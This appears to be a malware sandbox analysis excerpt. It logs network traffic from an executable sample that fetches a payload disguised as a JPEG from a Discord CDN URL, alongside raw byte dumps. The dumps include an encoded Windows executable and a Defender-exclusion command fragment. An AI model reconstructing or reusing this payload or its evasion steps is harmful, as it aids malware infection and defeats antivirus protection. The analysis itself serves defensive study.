                    Data Ascii: 114 0 117 0 43 0 47 0 57 0 122 0 103 0 52 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 54 0 79 0 98 0 75 0 47 0 54 0 117 0 77 0 65 0 80 0 47 0 109 0 53 0 103 0 68 0 47 0 53 0 117 0 89 0 65 0 47 0 43 0 98 0 109 0 65 0 80 0 47 0 109 0 53 0 103 0 68 0 47 0 53 0 11
                    2021-10-26 16:59:18 UTC1513INData Raw: 30 20 31 31 34 20 30 20 31 31 33 20 30 20 34 33 20 30 20 31 32 30 20 30 20 34 37 20 30 20 35 35 20 30 20 31 30 35 20 30 20 35 33 20 30 20 31 31 37 20 30 20 34 37 20 30 20 34 33 20 30 20 35 32 20 30 20 31 31 37 20 30 20 39 38 20 30 20 31 31 38 20 30 20 34 37 20 30 20 31 31 37 20 30 20 37 36 20 30 20 31 30 39 20 30 20 35 35 20 30 20 34 37 20 30 20 35 34 20 30 20 31 30 31 20 30 20 31 31 34 20 30 20 31 31 35 20 30 20 38 30 20 30 20 34 37 20 30 20 31 31 31 20 30 20 35 34 20 30 20 34 37 20 30 20 37 32 20 30 20 34 37 20 30 20 31 32 32 20 30 20 35 37 20 30 20 37 32 20 30 20 37 39 20 30 20 34 37 20 30 20 35 31 20 30 20 31 30 38 20 30 20 31 30 30 20 30 20 37 32 20 30 20 38 30 20 30 20 35 36 20 30 20 31 31 30 20 30 20 37 32 20 30 20 36 35 20 30 20 39 37 20 30 20 37
                    Data Ascii: 0 114 0 113 0 43 0 120 0 47 0 55 0 105 0 53 0 117 0 47 0 43 0 52 0 117 0 98 0 118 0 47 0 117 0 76 0 109 0 55 0 47 0 54 0 101 0 114 0 115 0 80 0 47 0 111 0 54 0 47 0 72 0 47 0 122 0 57 0 72 0 79 0 47 0 51 0 108 0 100 0 72 0 80 0 56 0 110 0 72 0 65 0 97 0 7
                    2021-10-26 16:59:18 UTC1529INData Raw: 20 30 20 36 35 20 30 20 38 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 31 31 39 20 30 20 37 32 20 30 20 37 38 20 30 20 36 35 20 30 20 36 38 20 30 20 37 33 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 36 20 30 20 36 35 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 36 20 30 20 38 30 20 30 20 36 35 20 30 20 36 39 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20
                    Data Ascii: 0 65 0 86 0 65 0 65 0 65 0 65 0 65 0 65 0 67 0 119 0 72 0 78 0 65 0 68 0 73 0 65 0 68 0 103 0 65 0 66 0 65 0 80 0 47 0 47 0 103 0 65 0 66 0 80 0 65 0 69 0 115 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 67 0 81 0 65 0 65 0 65 0 65 0 65
                    2021-10-26 16:59:18 UTC1545INData Raw: 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 38 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 36 20 30 20 36 35 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 39 38 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 37 20 30 20 34 38 20 30 20 36 35 20 30 20 39 38 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 39 30 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 32 20 30 20 37 37 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 35 20 30 20 36 36 20 30 20 31 32 31 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 37 20 30 20 36 35 20 30 20 39 38 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 31 30 20 30 20 36 35 20 30 20
                    Data Ascii: 65 0 71 0 56 0 65 0 98 0 81 0 66 0 116 0 65 0 71 0 69 0 65 0 98 0 103 0 66 0 107 0 65 0 67 0 48 0 65 0 98 0 65 0 66 0 112 0 65 0 71 0 52 0 65 0 90 0 81 0 65 0 103 0 65 0 72 0 77 0 65 0 100 0 65 0 66 0 121 0 65 0 71 0 107 0 65 0 98 0 103 0 66 0 110 0 65 0
                    2021-10-26 16:59:18 UTC1561INData Raw: 30 20 36 35 20 30 20 37 31 20 30 20 31 31 35 20 30 20 36 35 20 30 20 39 30 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 32 20 30 20 38 31 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 31 20 30 20 34 38 20 30 20 36 35 20 30 20 38 39 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 34 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 36 20 30 20 35 30 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 37 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 31 20 30 20 37 33 20 30 20 36 35 20 30 20 39 38 20 30 20 36 35 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30
                    Data Ascii: 0 65 0 71 0 115 0 65 0 90 0 81 0 65 0 103 0 65 0 72 0 81 0 65 0 98 0 119 0 65 0 103 0 65 0 71 0 48 0 65 0 89 0 81 0 66 0 114 0 65 0 71 0 85 0 65 0 73 0 65 0 66 0 50 0 65 0 71 0 107 0 65 0 99 0 119 0 66 0 112 0 65 0 71 0 73 0 65 0 98 0 65 0 66 0 108 0 65 0
                    2021-10-26 16:59:18 UTC1577INData Raw: 20 39 39 20 30 20 31 30 33 20 30 20 36 36 20 30 20 35 30 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 38 20 30 20 37 33 20 30 20 36 35 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 36 20 30 20 38 34 20 30 20 36 35 20 30 20 37 30 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 38 31 20 30 20 36 35 20 30 20 37 38 20 30 20 36 35 20 30 20 37 30 20 30 20 39 39 20 30 20 36 35 20 30 20 39 37 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 37 20 30 20 36 35 20 30 20 37 31 20 30 20 38 31 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39
                    Data Ascii: 99 0 103 0 66 0 50 0 65 0 71 0 85 0 65 0 99 0 103 0 65 0 103 0 65 0 68 0 73 0 65 0 77 0 65 0 65 0 119 0 65 0 68 0 103 0 65 0 73 0 65 0 66 0 84 0 65 0 70 0 65 0 65 0 77 0 81 0 65 0 78 0 65 0 70 0 99 0 65 0 97 0 81 0 66 0 117 0 65 0 71 0 81 0 65 0 98 0 119
                    2021-10-26 16:59:18 UTC1593INData Raw: 20 31 30 36 20 30 20 31 30 37 20 30 20 31 32 32 20 30 20 38 39 20 30 20 38 38 20 30 20 34 38 20 30 20 31 30 35 20 30 20 38 30 20 30 20 31 30 36 20 30 20 31 31 39 20 30 20 31 31 38 20 30 20 39 39 20 30 20 35 31 20 30 20 38 36 20 30 20 31 31 39 20 30 20 39 39 20 30 20 37 31 20 30 20 35 37 20 30 20 31 32 31 20 30 20 31 30 30 20 30 20 37 31 20 30 20 38 36 20 30 20 31 30 37 20 30 20 38 34 20 30 20 34 39 20 30 20 37 37 20 30 20 34 33 20 30 20 36 38 20 30 20 38 31 20 30 20 31 31 31 20 30 20 37 34 20 30 20 36 37 20 30 20 38 31 20 30 20 34 38 20 30 20 37 35 20 30 20 36 37 20 30 20 38 31 20 30 20 31 30 37 20 30 20 35 36 20 30 20 39 39 20 30 20 35 31 20 30 20 38 36 20 30 20 31 31 39 20 30 20 39 39 20 30 20 37 31 20 30 20 35 37 20 30 20 31 32 31 20 30 20 31 30 30 20
                    Data Ascii: 106 0 107 0 122 0 89 0 88 0 48 0 105 0 80 0 106 0 119 0 118 0 99 0 51 0 86 0 119 0 99 0 71 0 57 0 121 0 100 0 71 0 86 0 107 0 84 0 49 0 77 0 43 0 68 0 81 0 111 0 74 0 67 0 81 0 48 0 75 0 67 0 81 0 107 0 56 0 99 0 51 0 86 0 119 0 99 0 71 0 57 0 121 0 100
                    2021-10-26 16:59:18 UTC1609INData Raw: 20 30 20 37 31 20 30 20 37 31 20 30 20 31 31 32 20 30 20 31 31 38 20 30 20 38 31 20 30 20 31 31 30 20 30 20 35 33 20 30 20 38 38 20 30 20 31 32 30 20 30 20 31 31 33 20 30 20 31 30 35 20 30 20 35 33 20 30 20 38 35 20 30 20 31 30 31 20 30 20 38 37 20 30 20 35 30 20 30 20 36 38 20 30 20 38 36 20 30 20 31 30 32 20 30 20 31 31 36 20 30 20 39 39 20 30 20 38 37 20 30 20 31 30 37 20 30 20 31 31 32 20 30 20 31 31 39 20 30 20 36 35 20 30 20 37 36 20 30 20 35 30 20 30 20 31 30 36 20 30 20 35 31 20 30 20 31 30 38 20 30 20 34 33 20 30 20 34 39 20 30 20 31 31 33 20 30 20 39 39 20 30 20 31 31 34 20 30 20 35 32 20 30 20 35 32 20 30 20 37 39 20 30 20 35 30 20 30 20 38 30 20 30 20 31 30 31 20 30 20 31 30 36 20 30 20 35 35 20 30 20 35 37 20 30 20 31 31 37 20 30 20 38 34 20
                    Data Ascii: 0 71 0 71 0 112 0 118 0 81 0 110 0 53 0 88 0 120 0 113 0 105 0 53 0 85 0 101 0 87 0 50 0 68 0 86 0 102 0 116 0 99 0 87 0 107 0 112 0 119 0 65 0 76 0 50 0 106 0 51 0 108 0 43 0 49 0 113 0 99 0 114 0 52 0 52 0 79 0 50 0 80 0 101 0 106 0 55 0 57 0 117 0 84
                    2021-10-26 16:59:18 UTC1625INData Raw: 34 38 20 30 20 37 31 20 30 20 36 37 20 30 20 38 33 20 30 20 31 31 33 20 30 20 37 31 20 30 20 38 33 20 30 20 37 33 20 30 20 39 38 20 30 20 35 31 20 30 20 36 38 20 30 20 38 31 20 30 20 36 39 20 30 20 36 36 20 30 20 36 35 20 30 20 38 31 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 35 32 20 30 20 37 33 20 30 20 36 37 20 30 20 36 38 20 30 20 31 31 39 20 30 20 36 35 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 31 30 33 20 30 20 37 33 20 30 20 37 35 20 30 20 36 35 20 30 20 31 31 31 20 30 20 37 33 20 30 20 36 37 20 30 20 36 35 20 30 20 38 31 20 30 20 36 38 20 30 20 37 36 20 30 20 38 35 20 30 20 38 36 20 30 20 36 38 20 30 20 34 37 20 30 20 38 36 20 30 20 31 31 38 20 30 20 35 35 20 30 20 35 36 20 30 20 31 30 31 20 30 20 37 31 20 30 20 37 38 20 30 20 31 31
                    Data Ascii: 48 0 71 0 67 0 83 0 113 0 71 0 83 0 73 0 98 0 51 0 68 0 81 0 69 0 66 0 65 0 81 0 85 0 65 0 65 0 52 0 73 0 67 0 68 0 119 0 65 0 119 0 103 0 103 0 73 0 75 0 65 0 111 0 73 0 67 0 65 0 81 0 68 0 76 0 85 0 86 0 68 0 47 0 86 0 118 0 55 0 56 0 101 0 71 0 78 0 11
                    2021-10-26 16:59:18 UTC1641INData Raw: 31 30 20 30 20 34 39 20 30 20 37 30 20 30 20 37 38 20 30 20 31 31 35 20 30 20 37 32 20 30 20 35 31 20 30 20 31 30 36 20 30 20 38 39 20 30 20 37 36 20 30 20 35 34 20 30 20 31 31 37 20 30 20 39 39 20 30 20 31 30 37 20 30 20 37 38 20 30 20 38 35 20 30 20 35 32 20 30 20 36 36 20 30 20 35 37 20 30 20 34 33 20 30 20 31 31 34 20 30 20 38 39 20 30 20 35 33 20 30 20 38 37 20 30 20 36 38 20 30 20 37 36 20 30 20 31 31 38 20 30 20 39 38 20 30 20 31 32 30 20 30 20 31 30 34 20 30 20 38 31 20 30 20 31 30 35 20 30 20 31 30 30 20 30 20 31 30 30 20 30 20 38 30 20 30 20 31 31 30 20 30 20 38 34 20 30 20 37 39 20 30 20 35 37 20 30 20 37 31 20 30 20 31 31 34 20 30 20 38 37 20 30 20 31 30 30 20 30 20 31 31 31 20 30 20 31 30 30 20 30 20 35 34 20 30 20 38 36 20 30 20 38 31 20 30
                    Data Ascii: 10 0 49 0 70 0 78 0 115 0 72 0 51 0 106 0 89 0 76 0 54 0 117 0 99 0 107 0 78 0 85 0 52 0 66 0 57 0 43 0 114 0 89 0 53 0 87 0 68 0 76 0 118 0 98 0 120 0 104 0 81 0 105 0 100 0 100 0 80 0 110 0 84 0 79 0 57 0 71 0 114 0 87 0 100 0 111 0 100 0 54 0 86 0 81 0
                    2021-10-26 16:59:18 UTC1657INData Raw: 34 20 30 20 33 37 20 30 20 31 30 35 20 30 20 33 37 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 31 31 30 20 30 20 31 32 30 20 30 20 31 30 35 20 30 20 31 32 31 20 30 20 31 30 33 20 30 20 31 30 32 20 30 20 39 38 20 30 20 39 39 20 30 20 33 37 20 30 20 31 31 30 20 30 20 33 37 20 30 20 31 32 31 20 30 20 31 30 37 20 30 20 31 32 30 20 30 20 31 31 30 20 30 20 39 38 20 30 20 31 31 34 20 30 20 31 31 32 20 30 20 31 30 30 20 30 20 31 31 33 20 30 20 31 32 32 20 30 20 31 31 36 20 30 20 31 31 34 20 30 20 31 30 30 20 30 20 39 38 20 30 20 33 37 20 30 20 31 30 30 20 30 20 33 37 20 30 20 31 30 39 20 30 20 31 30 32 20 30 20 31 31 37 20 30 20 31 31 38 20 30 20 31 31 37 20 30 20 31 30 31 20 30 20 31 30 31 20 30 20 39 37 20 30 20 31 30 36 20 30 20 31 31 32 20 30 20 31 32 31 20
                    Data Ascii: 4 0 37 0 105 0 37 0 115 0 105 0 110 0 120 0 105 0 121 0 103 0 102 0 98 0 99 0 37 0 110 0 37 0 121 0 107 0 120 0 110 0 98 0 114 0 112 0 100 0 113 0 122 0 116 0 114 0 100 0 98 0 37 0 100 0 37 0 109 0 102 0 117 0 118 0 117 0 101 0 101 0 97 0 106 0 112 0 121
                    2021-10-26 16:59:18 UTC1673INData Raw: 20 31 31 31 20 30 20 31 32 31 20 30 20 31 30 36 20 30 20 31 31 32 20 30 20 31 31 36 20 30 20 31 31 30 20 30 20 31 30 38 20 30 20 33 37 20 30 20 31 31 35 20 30 20 33 37 20 30 20 31 32 32 20 30 20 31 31 37 20 30 20 31 30 32 20 30 20 31 30 33 20 30 20 31 30 34 20 30 20 31 30 31 20 30 20 31 30 32 20 30 20 31 31 38 20 30 20 39 37 20 30 20 31 31 31 20 30 20 31 30 39 20 30 20 31 30 30 20 30 20 39 37 20 30 20 31 30 35 20 30 20 33 37 20 30 20 31 31 36 20 30 20 33 37 20 30 20 39 38 20 30 20 31 31 30 20 30 20 31 31 35 20 30 20 31 32 32 20 30 20 31 30 34 20 30 20 39 39 20 30 20 31 31 33 20 30 20 33 37 20 30 20 31 31 31 20 30 20 33 37 20 30 20 31 30 38 20 30 20 31 31 35 20 30 20 31 30 32 20 30 20 39 39 20 30 20 31 31 38 20 30 20 31 30 31 20 30 20 31 30 36 20 30 20 31
                    Data Ascii: 111 0 121 0 106 0 112 0 116 0 110 0 108 0 37 0 115 0 37 0 122 0 117 0 102 0 103 0 104 0 101 0 102 0 118 0 97 0 111 0 109 0 100 0 97 0 105 0 37 0 116 0 37 0 98 0 110 0 115 0 122 0 104 0 99 0 113 0 37 0 111 0 37 0 108 0 115 0 102 0 99 0 118 0 101 0 106 0 1
                    2021-10-26 16:59:18 UTC1689INData Raw: 37 20 30 20 31 31 36 20 30 20 31 30 33 20 30 20 39 39 20 30 20 31 30 36 20 30 20 31 30 31 20 30 20 31 32 31 20 30 20 31 31 36 20 30 20 31 31 32 20 30 20 39 37 20 30 20 33 37 20 30 20 31 33 20 30 20 31 30 20 30 20 33 37 20 30 20 31 30 30 20 30 20 31 32 31 20 30 20 31 31 38 20 30 20 31 30 32 20 30 20 39 39 20 30 20 39 38 20 30 20 31 32 32 20 30 20 31 31 32 20 30 20 31 31 34 20 30 20 39 37 20 30 20 39 37 20 30 20 33 37 20 30 20 31 31 35 20 30 20 33 37 20 30 20 31 31 35 20 30 20 31 31 37 20 30 20 31 31 34 20 30 20 31 30 39 20 30 20 31 30 36 20 30 20 31 32 32 20 30 20 31 32 32 20 30 20 39 39 20 30 20 31 30 31 20 30 20 31 32 30 20 30 20 31 30 35 20 30 20 33 37 20 30 20 39 39 20 30 20 33 37 20 30 20 31 31 38 20 30 20 31 31 36 20 30 20 31 30 35 20 30 20 39 38 20
                    Data Ascii: 7 0 116 0 103 0 99 0 106 0 101 0 121 0 116 0 112 0 97 0 37 0 13 0 10 0 37 0 100 0 121 0 118 0 102 0 99 0 98 0 122 0 112 0 114 0 97 0 97 0 37 0 115 0 37 0 115 0 117 0 114 0 109 0 106 0 122 0 122 0 99 0 101 0 120 0 105 0 37 0 99 0 37 0 118 0 116 0 105 0 98
                    2021-10-26 16:59:18 UTC1705INData Raw: 30 20 39 32 20 30 20 36 39 20 30 20 31 32 30 20 30 20 39 39 20 30 20 31 30 38 20 30 20 31 31 37 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 31 30 20 30 20 31 31 35 20 30 20 39 32 20 30 20 38 30 20 30 20 39 37 20 30 20 31 31 36 20 30 20 31 30 34 20 30 20 31 31 35 20 30 20 30 20 33 20 34 38 20 30 20 30 20 38 39 20 36 35 20 30 20 31 30 30 20 30 20 31 30 30 20 30 20 34 35 20 30 20 37 37 20 30 20 31 31 32 20 30 20 38 30 20 30 20 31 31 34 20 30 20 31 30 31 20 30 20 31 30 32 20 30 20 31 30 31 20 30 20 31 31 34 20 30 20 31 30 31 20 30 20 31 31 30 20 30 20 39 39 20 30 20 31 30 31 20 30 20 33 32 20 30 20 34 35 20 30 20 36 39 20 30 20 31 32 30 20 30 20 39 39 20 30 20 31 30 38 20 30 20 31 31 37 20 30 20 31 31 35 20 30 20 31 30 35 20 30 20 31 31
                    Data Ascii: 0 92 0 69 0 120 0 99 0 108 0 117 0 115 0 105 0 111 0 110 0 115 0 92 0 80 0 97 0 116 0 104 0 115 0 0 3 48 0 0 89 65 0 100 0 100 0 45 0 77 0 112 0 80 0 114 0 101 0 102 0 101 0 114 0 101 0 110 0 99 0 101 0 32 0 45 0 69 0 120 0 99 0 108 0 117 0 115 0 105 0 11
                    2021-10-26 16:59:18 UTC1721INData Raw: 38 20 31 35 36 20 35 20 31 30 20 31 20 31 38 20 31 32 38 20 31 36 30 20 39 20 30 20 32 20 31 20 31 38 20 31 32 38 20 32 32 35 20 31 37 20 31 32 39 20 34 31 20 34 20 31 30 20 31 20 31 38 20 31 32 34 20 37 20 37 20 35 20 31 34 20 31 34 20 31 34 20 31 34 20 32 20 33 20 33 32 20 30 20 31 34 20 36 20 30 20 33 20 38 20 31 34 20 31 34 20 32 20 33 20 30 20 30 20 31 34 20 35 20 30 20 32 20 31 34 20 31 34 20 31 34 20 33 20 37 20 31 20 32 20 34 20 30 20 31 20 32 38 20 32 38 20 34 20 33 32 20 31 20 32 20 32 38 20 33 20 37 20 31 20 38 20 34 20 37 20 31 20 31 38 20 31 30 39 20 33 20 37 20 31 20 31 34 20 35 20 37 20 32 20 33 30 20 30 20 32 20 35 20 31 36 20 31 20 30 20 33 30 20 30 20 35 20 37 20 32 20 31 39 20 30 20 32 20 36 20 32 31 20 31 38 20 31 31 36 20 31 20 31 39
                    Data Ascii: 8 156 5 10 1 18 128 160 9 0 2 1 18 128 225 17 129 41 4 10 1 18 124 7 7 5 14 14 14 14 2 3 32 0 14 6 0 3 8 14 14 2 3 0 0 14 5 0 2 14 14 14 3 7 1 2 4 0 1 28 28 4 32 1 2 28 3 7 1 8 4 7 1 18 109 3 7 1 14 5 7 2 30 0 2 5 16 1 0 30 0 5 7 2 19 0 2 6 21 18 116 1 19
                    2021-10-26 16:59:18 UTC1737INData Raw: 20 33 32 20 33 32 20 36 30 20 31 31 36 20 31 31 34 20 31 31 37 20 31 31 35 20 31 31 36 20 37 33 20 31 31 30 20 31 30 32 20 31 31 31 20 33 32 20 31 32 30 20 31 30 39 20 31 30 38 20 31 31 30 20 31 31 35 20 36 31 20 33 34 20 31 31 37 20 31 31 34 20 31 31 30 20 35 38 20 31 31 35 20 39 39 20 31 30 34 20 31 30 31 20 31 30 39 20 39 37 20 31 31 35 20 34 35 20 31 30 39 20 31 30 35 20 39 39 20 31 31 34 20 31 31 31 20 31 31 35 20 31 31 31 20 31 30 32 20 31 31 36 20 34 35 20 39 39 20 31 31 31 20 31 30 39 20 35 38 20 39 37 20 31 31 35 20 31 30 39 20 34 36 20 31 31 38 20 35 30 20 33 34 20 36 32 20 31 33 20 31 30 20 33 32 20 33 32 20 33 32 20 33 32 20 36 30 20 31 31 35 20 31 30 31 20 39 39 20 31 31 37 20 31 31 34 20 31 30 35 20 31 31 36 20 31 32 31 20 36 32 20 31 33 20
                    Data Ascii: 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 50 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.349694162.159.129.233443C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    TimestampkBytes transferredDirectionData
                    2021-10-26 16:59:38 UTC1739OUTGET /attachments/893177342426509335/897185985257963540/5D70BEC8.jpg HTTP/1.1
                    Host: cdn.discordapp.com
                    Connection: Keep-Alive
                    2021-10-26 16:59:38 UTC1739INHTTP/1.1 200 OK
                    Date: Tue, 26 Oct 2021 16:59:38 GMT
                    Content-Type: image/jpeg
                    Content-Length: 1023400
                    Connection: close
                    CF-Ray: 6a453c7f0b6768fd-FRA
                    Accept-Ranges: bytes
                    Age: 1281600
                    Cache-Control: public, max-age=31536000
                    ETag: "6120be0358fed446c42e1349cbecf6f0"
                    Expires: Wed, 26 Oct 2022 16:59:38 GMT
                    Last-Modified: Mon, 11 Oct 2021 18:16:47 GMT
                    Vary: Accept-Encoding
                    CF-Cache-Status: HIT
                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Cf-Bgj: h2pri
                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                    x-goog-generation: 1633976207854460
                    x-goog-hash: crc32c=O7ubRQ==
                    x-goog-hash: md5=YSC+A1j+1EbELhNJy+z28A==
                    x-goog-metageneration: 1
                    x-goog-storage-class: STANDARD
                    x-goog-stored-content-encoding: identity
                    x-goog-stored-content-length: 1023400
                    X-GUploader-UploadID: ADPycdsek7nfLCBgq3CiyQdT8Mtqc98BgMYNhM2ST5khIifXuRTmOm87PegTlyuCm40PG1fzO_R3cOMiu2jb9YPIgu2hcteOPQ
                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0kRsfG06tJVMqegACS0gqVW7y8C0GiSE%2BCHtrIfGPNi%2B29tcccxMRmvLvlEqn7D7GhWqwbmOKAvApvZbIsVnQknN2T3Y2mjw1HGtGQaFrYdIy1Y2O919exqksowOyJ4aBAQjGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    2021-10-26 16:59:38 UTC1740INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                    Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                    2021-10-26 16:59:38 UTC1740INData Raw: 37 37 20 39 30 20 31 34 34 20 30 20 33 20 30 20 30 20 30 20 34 20 30 20 30 20 30 20 32 35 35 20 32 35 35 20 30 20 30 20 31 38 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 36 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 32 38 20 30 20 30 20 30 20 31 34 20 33 31 20 31 38 36 20 31 34 20 30 20 31 38 30 20 39 20 32 30 35 20 33 33 20 31 38 34 20 31 20 37 36 20 32 30 35 20 33 33 20 38 34 20 31 30 34 20 31 30 35 20 31 31 35 20 33 32 20 31 31 32 20 31 31 34 20 31 31 31 20 31 30 33 20 31 31 34 20 39 37 20 31 30 39 20 33 32 20 39 39 20 39 37 20 31 31 30 20 31 31 30 20 31 31 31 20 31 31 36 20
                    Data Ascii: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116
                    2021-10-26 16:59:38 UTC1742INData Raw: 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 34 20 30 20 30 20 30 20 32 32 20 30 20 30 20 30 20 32 34 20 30 20 30 20 30 20 36 34 20 30 20 30 20 30 20 36 36 20 30 20 30 20 30 20 36 38 20 30 20 30 20 30 20 37 30 20 30 20 30 20 30 20 37 32 20 30 20 30 20 30 20 37 34 20 30 20 30 20 30 20 37 36 20 30 20 30 20 30 20 39 32 20 30 20 30 20 30 20 39 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 38 20 30 20 30 20 30 20 31 32 20 30 20 30 20 30 20 31 36 20 30 20 30 20 30 20 32 32 20 30 20 30 20 30 20 32 38 20 30 20 30 20 30 20 33 32 20 30 20 30 20 30 20 34 30 20 30 20 30 20 30 20 34 34 20 30 20 30 20 30 20 35 32 20 30 20 30 20 30 20 36 30 20 30
                    Data Ascii: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 0 22 0 0 0 24 0 0 0 64 0 0 0 66 0 0 0 68 0 0 0 70 0 0 0 72 0 0 0 74 0 0 0 76 0 0 0 92 0 0 0 94 0 0 0 0 0 0 0 8 0 0 0 12 0 0 0 16 0 0 0 22 0 0 0 28 0 0 0 32 0 0 0 40 0 0 0 44 0 0 0 52 0 0 0 60 0
                    2021-10-26 16:59:38 UTC1743INData Raw: 34 20 31 31 37 20 31 30 39 20 38 30 20 34 38 20 34 38 20 31 31 34 20 38 37 20 38 35 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 39 20 31 30 39 20 31 32 34 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31
                    Data Ascii: 4 117 109 80 48 48 114 87 85 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 119 109 124 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 1
